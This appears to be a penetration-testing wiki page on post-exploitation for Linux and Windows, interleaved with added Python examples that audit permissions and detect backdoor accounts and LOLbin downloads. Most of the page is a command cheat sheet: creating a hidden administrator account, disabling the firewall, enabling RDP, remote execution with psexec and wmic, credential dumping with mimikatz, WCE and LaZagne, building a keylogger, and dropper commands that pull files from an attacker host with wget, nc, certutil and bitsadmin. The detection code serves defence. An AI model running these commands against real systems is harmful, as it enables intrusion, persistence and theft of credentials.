Intro to Post Exploitation

Penetration Testing Wiki

Linux Post-exploitation

  • Check wrong permissions:

Find setuid binaries:

find / -perm -4000 -ls 2> /dev/null

Find files world writable:

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

Find directories world writable:

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null
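The three find one-liners above are also the standard hardening audit: the same walk, done from the defender's side, tells you what an attacker who lands on the box will see first. The script below is an added example (not from the original page) that reproduces them in Python on a constructed sample tree, with two refinements a practitioner wants: symlinks are never followed, and a world-writable directory that carries the sticky bit (/tmp style) is treated as normal, because the dangerous case is a world-writable directory without it. The tree layout and file names are invented for the demo.

```python
import os
import stat
import tempfile

# Pseudo-filesystems the find one-liners prune with "-path /sys -prune -o -path /proc -prune".
PRUNE = {"/sys", "/proc"}


def audit_permissions(root):
    """Walk `root` and report what the three find commands report:
    setuid executables, world-writable regular files and world-writable
    directories. Returns {finding_type: sorted list of absolute paths}."""
    findings = {"setuid": [], "world_writable_file": [], "world_writable_dir": []}
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place so os.walk never descends into /sys or /proc.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
        for name in dirnames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            # World-writable WITH the sticky bit (/tmp style) is normal; without it
            # any local user can delete or rename other users' files in there.
            if stat.S_ISDIR(mode) and mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                findings["world_writable_dir"].append(path)
        for name in filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode  # lstat: judge the link itself, never its target
            if not stat.S_ISREG(mode):
                continue
            if mode & stat.S_ISUID:
                findings["setuid"].append(path)
            if mode & stat.S_IWOTH:
                findings["world_writable_file"].append(path)
    return {k: sorted(v) for k, v in findings.items()}


def build_sample_tree():
    """Constructed sample tree (not a real system) so the audit runs offline."""
    root = tempfile.mkdtemp(prefix="permaudit_")
    layout = {
        "bin/su_clone": (b"#!/bin/sh\n", 0o4755),   # setuid bit set
        "etc/normal.conf": (b"x=1\n", 0o644),        # healthy permissions
        "var/open.log": (b"", 0o666),                # world-writable file
    }
    for rel, (data, mode) in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
    os.makedirs(os.path.join(root, "shared"))
    os.chmod(os.path.join(root, "shared"), 0o777)    # world-writable, no sticky bit
    os.makedirs(os.path.join(root, "tmp"))
    os.chmod(os.path.join(root, "tmp"), 0o1777)      # /tmp style: sticky bit, ignored
    return root


if __name__ == "__main__":
    for kind, paths in audit_permissions(build_sample_tree()).items():
        print(kind, paths)
```

Run it against "/" as root to get the real picture; the `2> /dev/null` of the originals corresponds here to catching `PermissionError` around the `os.lstat` calls if you run it unprivileged.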

Look for interesting files:

find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null

Check sudo:

sudo su
sudo -l

Show the contents of a PKCS#12 (.p12/.pfx) object (prompts for its password):

openssl pkcs12 -info -in $FILE

Show certs in a PKCS#7 file and verify S/MIME signatures:

openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der

Show keystore content:

keytool -list -v -keystore keystore.jks

  • Commands for information gathering:

ps -ef
mount
/sbin/ifconfig -a
route -n
cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu

Find users with shell access:

egrep -e '/bin/(ba)?sh' /etc/passwd

Check bootup services:

ls /etc/rc*

SSH relationships and logins:

cat ~/.ssh/*

Windows Post-exploitation

Check filesystem:

Like “ls -la” in Linux:

dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt

Compute MD5 hash:

Get-FileHash -Algorithm MD5 -Path .\$FILE

Check registry:

reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

Check scheduler:

schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt

Other checks:

DRIVERQUERY

Reboot the host (not a check: this restarts the machine):

wmic os where Primary='TRUE' reboot

List hotfixes:

wmic qfe

Open an NTFS alternate data stream (myfile.txt:lion.txt does not show in a plain dir listing):

notepad myfile.txt:lion.txt

Event viewer, logged-on users, connections, firewall config, ACLs of a service binary, hosts file:

eventvwr.exe
quser > rdp.txt
netstat -an > netstat.txt
netsh firewall show config > firewall.txt
icacls service.exe
type C:\Windows\System32\drivers\etc\hosts

Wmic commands:

wmic service get name,displayname,pathname,startmode > wmic_service.txt
wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
wmic /node:"" product get name,version,vendor
wmic process get Caption,CommandLine
wmic printer list status
wmic cpu get

List SIDs of the system (as admin):

wmic useraccount get name,sid,fullname

Net commands:

net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr

Backdoor account:

net user hax0r hax0r /add
net localgroup administrators hax0r /add
net localgroup "Remote Desktop users" hax0r /add
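The backdoor-account recipe above leaves a very recognisable trace in the Security log: a 4720 (user account created) followed within seconds by a 4732 (member added to a security-enabled local group) into Administrators or Remote Desktop Users. The following is an added detection example, not code from the original page: it parses constructed, flattened Security-log lines (one event per line, `key=value` fields, invented account names) and raises one alert per sensitive group add that happens within a short window of the account's creation. The line format and field names are assumptions made for the demo, not the real EVTX layout.

```python
import re
from datetime import datetime, timedelta

# Groups whose membership change right after an account creation matches the
# "net user /add" + "net localgroup ... /add" pattern.
SENSITIVE_GROUPS = {"Administrators", "Remote Desktop Users"}
WINDOW = timedelta(minutes=10)

# Constructed sample lines (not real telemetry): "<UTC time> <EventID> key=value ...".
# 4720 = user account created, 4732 = member added to a security-enabled local group.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 4720 Target=hax0r Subject=svc_backup
2024-05-01T10:00:04Z 4732 Target=hax0r Subject=svc_backup Group=Administrators
2024-05-01T10:00:06Z 4732 Target=hax0r Subject=svc_backup Group="Remote Desktop Users"
2024-05-01T11:30:00Z 4720 Target=jdoe Subject=helpdesk
2024-05-01T11:31:00Z 4732 Target=jdoe Subject=helpdesk Group=Users
2024-05-03T09:00:00Z 4732 Target=jdoe Subject=helpdesk Group=Administrators
"""

# key=value tokens; values may be quoted when they contain spaces.
TOKEN = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Turn one flattened log line into a dict with parsed time and event id."""
    ts, event_id, rest = line.split(" ", 2)
    fields = {k: v.strip('"') for k, v in TOKEN.findall(rest)}
    return {"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "id": int(event_id), **fields}


def find_backdoor_accounts(log_text, window=WINDOW):
    """One alert per 4732 into a sensitive group whose target account was
    created (4720) at most `window` earlier. Events are processed in time order
    so a creation is only matched by group adds that follow it."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    created = {}   # account name -> time of its most recent 4720
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4720:
            created[ev["Target"]] = ev["time"]
        elif ev["id"] == 4732 and ev.get("Group") in SENSITIVE_GROUPS:
            born = created.get(ev["Target"])
            if born is not None and timedelta(0) <= ev["time"] - born <= window:
                alerts.append({
                    "account": ev["Target"],
                    "group": ev["Group"],
                    "by": ev["Subject"],
                    "seconds_after_creation": int((ev["time"] - born).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_backdoor_accounts(SAMPLE_LOG):
        print(alert)
```

In the sample, jdoe's promotion to Administrators two days after creation does not fire; if the window were dropped entirely, every legitimate onboarding would. The `Subject` field is what lets the responder see which already-compromised account did the adding.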

Check routing/network information:

route print
arp -a
ipconfig /all
getmac

Show files attributes / permissions

cacls cmd.exe
attrib cmd.exe

List services:

sc queryex type= service state= all
net start

Other info:

systeminfo
whoami

Same on Windows XP, which lacks whoami by default:

echo %USERNAME%

  • Firewall

netsh firewall show stat
netsh firewall show config
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall:

netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

  • RDP

Show RDP sessions:

quser
qwinsta

Enable RDP (Terminal Services) and allow it through the firewall:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set service type=remotedesktop mode=enable
net start termservice
net start "Terminal Services"

The service is hosted as svchost.exe -k termsvcs; list processes with their services on a remote host:

tasklist /svc /S servername /U username /P password

Change RDP daemon status from Meterpreter (more Meterpreter commands in Metasploit Meterpreter Cheat Sheet):

meterpreter > reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
meterpreter > reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1

Change RDP port:

HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, value PortNumber (REG_DWORD, default 3389)

Remote Execution commands:

wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
tasklist.exe /S $IP /U domain\username
tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
taskkill.exe /S $IP /U domain\username /F /FI "norton"
quser /SERVER:$IP

From sysinternals psexec:

psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI Exec via Powershell

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(windows/local/ps_wmi_exec) >

On the same host, but as a different user:

runas /user:administrator cmd
runas /noprofile /user:DOMAIN\administrator cmd
runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"

Windows exploit suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)

python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

Manual method

dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
dir %USERPROFILE%\Favorites
type C:\Windows\System32\drivers\etc\hosts

LaZagne

Download LaZagne from https://github.com/AlessandroZ/LaZagne

laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox

RATs (Remote Administration Tools)

  • Pupy https://github.com/n1nj4sec/pupy: opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Sniffers

Sniffers for Windows

Install Wireshark, also use in console dumpcap:

dumpcap -D
dumpcap -i $IFACE

Keyloggers for Windows

Windows keylogger (no admin rights):

To cross-compile it for Windows:

i686-w64-mingw32-g++ klog_main.cpp -o klog -static

Network sniffers for Linux

tcpdump -X -s 0 -i $INTERFACE

Password dumping

mimikatz

mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv

Fgdump

Dumps hashes (needs SYSTEM privileges)

fgdump.exe

WCE (Windows Credential Editor)

Dumps clear passwords:

wce -w

Dumps hashes:

wce

Persistent, writes in credentials.txt:

wce -r

Change your credentials in memory:

wce -s

Droppers

Droppers are programs that let you download tools, trojans, etc. to the target machine in order to continue the compromise locally.

Droppers using Linux

wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE user@$IP:~

Droppers using Windows

Powershell (curl is an alias of Invoke-WebRequest; without -OutFile the body is only returned to the pipeline, not saved):

curl -Uri $URL -OutFile $FILE

See also Powercat in the Powershell frameworks section.

ROBOCOPY

NET USE \\$IP\IPC$ /USER:DOMAIN\USER
ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
NET USE \\$IP\IPC$ /D

BITSAdmin

https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool

Direct Transfer:

bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE

Using a download queue:

bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE
bitsadmin /resume myDownloadJob
bitsadmin /complete myDownloadJob

(A created job stays suspended until /resume, and the file is only written under its final name after /complete.)

Certutil

certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe

Notepad

notepad.exe http://$IP/file.txt

Living Off the Land (LOLbins) for Windows

Examples:

hh.exe C:\windows\system32\calc.exe

C# compiler shipped with the .NET Framework (Framework64 on 64-bit):

%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe
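Every dropper and LOLbin invocation listed above (certutil -urlcache, bitsadmin /transfer, notepad with a URL, hh.exe launching an executable) is a signed Windows binary doing something it normally never does, which is exactly what process-creation telemetry is good at catching. The script below is an added example, not code from the original page: it runs a small rule set over constructed Sysmon-style process-creation records (invented paths and an invented host 10.0.0.5), pairing each command from this section with a benign use of the same binary so the rules can be seen not to fire on normal administration. The record layout (`Image`, `CommandLine`) is an assumption for the demo.

```python
import re

# Constructed process-creation records (Sysmon Event 1 style, not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": 'certutil.exe -urlcache -split -f "https://10.0.0.5/files/netcat.exe" nc.exe'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -hashfile setup.msi SHA256"},                 # benign
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer myDownloadJob /download /priority normal http://10.0.0.5/a.exe c:\a.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /list /allusers"},                           # benign
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe http://10.0.0.5/file.txt"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},                # benign
    {"Image": r"C:\Windows\hh.exe",
     "CommandLine": r"hh.exe C:\windows\system32\calc.exe"},
    {"Image": r"C:\Windows\hh.exe",
     "CommandLine": r"hh.exe C:\Program Files\App\help.chm"},               # benign
]

URL = r"https?://"

# (rule name, binary it applies to, pattern the command line must match)
RULES = [
    # certutil used as a downloader: -urlcache together with -f and a URL
    ("certutil_urlcache_download", "certutil.exe", re.compile(r"-urlcache\b.*\s-f\b.*" + URL, re.I)),
    # bitsadmin creating or populating a download job from a URL
    ("bitsadmin_download", "bitsadmin.exe", re.compile(r"/(transfer|addfile)\b.*" + URL, re.I)),
    # notepad handed a URL instead of a local file
    ("notepad_remote_open", "notepad.exe", re.compile(URL, re.I)),
    # HTML Help viewer given an .exe as its "help file"
    ("hh_executes_binary", "hh.exe", re.compile(r"\s\S+\.exe\s*$", re.I)),
]


def basename(image):
    """Last path component of a Windows image path, lower-cased for matching."""
    return image.rsplit("\\", 1)[-1].lower()


def match_lolbin_rules(events):
    """Return (rule_name, command_line) for every record that trips a rule."""
    hits = []
    for ev in events:
        name = basename(ev["Image"])
        for rule, binary, pattern in RULES:
            if name == binary and pattern.search(ev["CommandLine"]):
                hits.append((rule, ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    for rule, cmd in match_lolbin_rules(SAMPLE_EVENTS):
        print(f"{rule}: {cmd}")
```

Matching on the image basename rather than the command line's first token matters: a renamed copy of certutil.exe still reports the original name in `OriginalFileName` in Sysmon, and a copy invoked via a relative path still shows its real `Image`.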

Droppers Using known protocols

HTTP

Python2

python -m SimpleHTTPServer
python -m SimpleHTTPServer 80

Python3

python3 -m http.server 8080

Php

php -S localhost:8000

Ruby

ruby -run -e httpd . -p 8000

FTP

pip install pyftpdlib
python -m pyftpdlib

SMB

impacket-smbserver PAYLOADS /root/payload

As part of post-exploitation we can also perform data exfiltration.
